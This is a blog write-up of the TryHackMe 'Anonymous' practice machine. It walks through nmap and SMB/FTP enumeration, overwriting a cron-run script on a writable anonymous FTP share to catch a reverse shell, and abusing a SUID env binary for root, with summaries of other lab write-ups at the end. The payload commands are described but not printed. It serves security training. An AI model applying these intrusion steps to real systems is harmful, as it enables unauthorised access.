Anonymous Writeup (TryHackMe Medium Machine)

-


Overview

Anonymous is a medium Linux machine from TryHackMe. This box tests your knowledge regarding Linux fundamentals and basic privilege escalation techniques.

We start with enumerating FTP and Samba SMB services. We discover a script that gets periodically ran on the FTP server. Combined with write access, we overwrite this script and get a shell.

Once inside, we discover an unusual SUID “env” binary. We abuse this with a simple command and get a root shell. Easy!


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.129.192 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 12:16 EDT
Nmap scan report for 10.10.129.192
Host is up (0.050s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.2.141
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -4h09m05s, deviation: 0s, median: -4h09m06s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-04-29T12:07:17
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2025-04-29T12:07:17+00:00
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   50.98 ms 10.9.0.1
2   51.31 ms 10.10.129.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds

The Nmap scan showed 4 open ports. Port 21 for FTP, port 22 for SSH and ports 139 and 445 for Samba SMB. We also get the versions of active services, the computer name “anonymous” and a directory “scripts” on FTP.


FTP & SMB enumeration

Whenever we discover services like FTP and SMB running on a machine, we always want to enumerate them. Maybe there are interesting files on FTP or accessible shares on SMB.

Starting with FTP, we can see in the Nmap scan that the anonymous login is allowed. That means we can login as user “anonymous” without password and see what is present on the FTP server.

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.129.192                                                                                                                                
Connected to 10.10.129.192.
220 NamelessOne's FTP Server!
Name (10.10.129.192:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||43208|)
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 May 13  2020 .
drwxr-xr-x    3 65534    65534        4096 May 13  2020 ..
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||60495|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 .
drwxr-xr-x    3 65534    65534        4096 May 13  2020 ..
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1075 Apr 29 12:10 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

We can notice couple of things here. First, there are some files in “scripts” directory that we can download with “get” command for inspection. Second, there’s potential username mentioned in the FTP header “NamelessOne”.


Next, I moved to SMB. There is a share called “pics” with 2 pictures of corgis (cute af). I inspected both images with “strings”. Neither of them contained useful information, just Photoshop metadata.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.10.129.192                                    
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            ANONYMOUS
                                                                                                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.129.192\\pics
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 07:11:34 2020
  ..                                  D        0  Wed May 13 21:59:10 2020
  corgo2.jpg                          N    42663  Mon May 11 20:43:42 2020
  puppos.jpeg                         N   265188  Mon May 11 20:43:42 2020

                20508240 blocks of size 1024. 13306800 blocks available

It’s also good practice to run “enum4linux” (or newer Python version “enum4linux-ng”) whenever there’s Samba SMB service on the machine. This gives us a lot of information about the system, also confirming that there’s user “namelessone” active.

┌──(kali㉿kali)-[~]
└─$ enum4linux -a 10.10.129.192   
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 29 12:38:40 2025

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                                                                                                                             
Target ........... 10.10.129.192                                                                                                                                                                                                                                                                                             
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.10.129.192 )===========================
[LOTS OF INFORMATION]
[LOTS OF INFORMATION]
[LOTS OF INFORMATION]
Enum4Linux found user “namelessone” with RID cycling


Uploading reverse shell to FTP & getting user flag

I went back to the files from the FTP server. There was “clean.sh” Bash script, which basically takes a list of files and deletes them from “/tmp” directory.

There was “removed_files.log” file too, which recorded every deleted file. Since there were multiple lines of output, I assumed that “clean.sh” was ran periodically on the machine.

If we look carefully on the FTP once again, we might notice that we have write permission over the “/scripts” directory. That means we can overwrite the “clean.sh” script with our own code.

we have write permission over “/script” directory on the FTP server


So I created my own “clean.sh” with a Bash reverse shell.

And simply uploaded it to the FTP with “put” command.

ftp> ls
229 Entering Extended Passive Mode (|||25149|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1075 Apr 29 15:20 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.
ftp> put clean.sh 
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||18316|)
150 Ok to send data.
100% |******************************************************************************************************************************************************************************************************************|    53        1.36 MiB/s    00:00 ETA226 Transfer complete.
53 bytes sent in 00:00 (0.26 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||10861|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000           53 Apr 29 15:21 clean.sh
-rw-rw-r--    1 1000     1000         1118 Apr 29 15:21 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

I waited for a minute or so and got the reverse shell as user “namelessone”.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.9.2.141] from (UNKNOWN) [10.10.167.103] 59714
bash: cannot set terminal process group (1413): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ whoami
whoami
namelessone
namelessone@anonymous:~$

User flag is waiting in NamelessOne’s home directory.


Abusing “env” SUID & getting root flag

It’s always good to remember your usual checklist of privilege escalation techniques and go down that list. Although we don’t have the password for our user (which narrows our possibilities), we can still check a lot of things like cronjobs, environment variables, SUID binaries and so on.

In fact, abusing SUID binary (which is a binary that can be ran with permissions of it’s owner) came out as the correct way to root this box. There was unusual “env” binary with SUID bit set.


Good resource for checking priv esc techniques against these binaries is GTFObins. When we search up the “env” binary, we find out that we can invoke a root shell by abusing the SUID bit.

One simple command does it all.

The root flag patiently waits in the root’s directory.


Summary

Anonymous is a medium machine from TryHackMe. This box is perfect for beginners starting in cybersecurity. It presents itself as a test for hackers, testing their knowledge from Linux fundamentals to basic privilege escalation techniques. Anonymous hardly depends on good service enumeration (FTP and SMB). After tricking the system into executing our malicious Bash script, we get a shell on the machine. After that, we manage to get the root shell by abusing the “env” binary with SUID bit set. Personally, I had fun doing this box. Definitely not a medium machine, if you ask me. My favourite part is the first one, when we had to overwrite a cronjob to get initial foothold. Recommending to anyone, who’s ready to practice the most basic and fundamental skills. Don’t let the medium difficulty scare you, it’s really not that bad.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more